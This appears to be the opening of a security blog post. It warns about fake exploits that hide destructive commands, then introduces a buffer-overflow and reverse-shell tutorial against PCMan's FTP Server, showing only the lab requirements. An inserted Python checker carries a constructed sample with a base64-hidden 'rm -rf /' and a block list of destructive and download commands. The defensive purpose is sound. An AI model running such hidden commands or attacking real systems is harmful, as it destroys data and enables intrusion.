There are thousands of exploits out in the wild, and even more being traded privately or held back as 0-days. Clearly we want to get access to as many of these resources as we can to maximize the chance of successful exploitation. A warning must be given to anyone downloading exploits: there are several fake exploits out there specifically designed to harm or destroy your computer. Never download exploits from a source and run them without first checking what they do and what commands they will execute on your system. It’s highly recommended that you decode any encoded values to find out what they actually mean. For example, this exploit, when decoded, runs the “rm -rf” command on your system. That said, some of the resources outlined here, such as exploit-db and SecurityFocus, can be considered pretty trustworthy.
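One way to do that check in practice, as an added example that is not part of the original post: a small Python script that pulls base64 and `\x`-escaped strings out of a downloaded exploit, decodes them, and flags any that contain a destructive shell command. The "exploit" text inside it is constructed for the demonstration and is not a real exploit.

```python
import base64
import binascii
import re

# Constructed sample of a downloaded "exploit" (not a real one): a harmless-looking
# script that hides a destructive shell command inside a base64 blob.
SAMPLE_EXPLOIT = r'''
import os, base64
host = "192.0.2.10"
payload = "A" * 2000
cmd = base64.b64decode("cm0gLXJmIC8=")  # passed off as a shellcode stub
os.system(cmd)
banner = "\x65\x63\x68\x6f\x20\x68\x65\x6c\x6c\x6f"
'''

# Shell fragments that should never appear in code you are about to run blindly.
DANGEROUS = ("rm -rf", "mkfs", "dd if=", "format c:", "del /", ":(){", "curl ", "wget ")

B64_RE = re.compile(r'[A-Za-z0-9+/]{8,}={0,2}')
HEX_RE = re.compile(r'(?:\\x[0-9a-fA-F]{2}){4,}')


def _printable(raw):
    """Decode bytes as ASCII text, or return None if the blob is not readable text."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\t\n" for c in text) else None


def decode_candidates(text):
    """Return (kind, encoded, decoded) for every blob that decodes to readable text."""
    found = []
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 (e.g. an identifier that merely looked like it)
        decoded = _printable(raw)
        if decoded:
            found.append(("base64", m.group(0), decoded))
    for m in HEX_RE.finditer(text):
        raw = bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', m.group(0)))
        decoded = _printable(raw)
        if decoded:
            found.append(("hex", m.group(0), decoded))
    return found


def review(text):
    """Decode every hidden string and list those that contain a dangerous command."""
    decoded = decode_candidates(text)
    dangerous = [d for _, _, d in decoded if any(k in d.lower() for k in DANGEROUS)]
    return {"decoded": decoded, "dangerous": dangerous}


if __name__ == "__main__":
    report = review(SAMPLE_EXPLOIT)
    for kind, enc, dec in report["decoded"]:
        print(f"{kind:7} {enc!r:34} -> {dec!r}")
    print("DANGEROUS:", report["dangerous"])
```

The decoded list is a review aid, not a verdict: anything it shows still needs reading in context, and a blob it cannot decode (custom encodings, compiled shellcode) deserves a debugger or sandbox before it ever runs on a real machine.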
This post will detail how to find a simple buffer overflow, gather the information you need to successfully exploit it, and eventually get a reverse shell against someone running this program. There are tons of exploits that could be used as an example, but this post will highlight PCMan’s FTP Server 2.0.7, simply because it was one of the first ones I found on exploit-db and it was relatively simple.
The following are the ideal requirements for following the guide. If you cannot or don’t wish to use identical software or versions, that’s fine, but I can’t guarantee that you won’t need to make modifications to get a proof of concept working.
- Windows XP – SP3 Virtual Machine (Victim).
- Kali Linux Virtual Machine (Attacker).
- OllyDbg v1.10 on Windows XP (Available here).
- PCMan’s FTP Server 2.0.7 (Available here under ‘vulnerable application’ link at the top of the page).
- A very basic understanding of x86 Assembly.
- A very basic understanding of Python.
- Be interested enough to learn and experiment.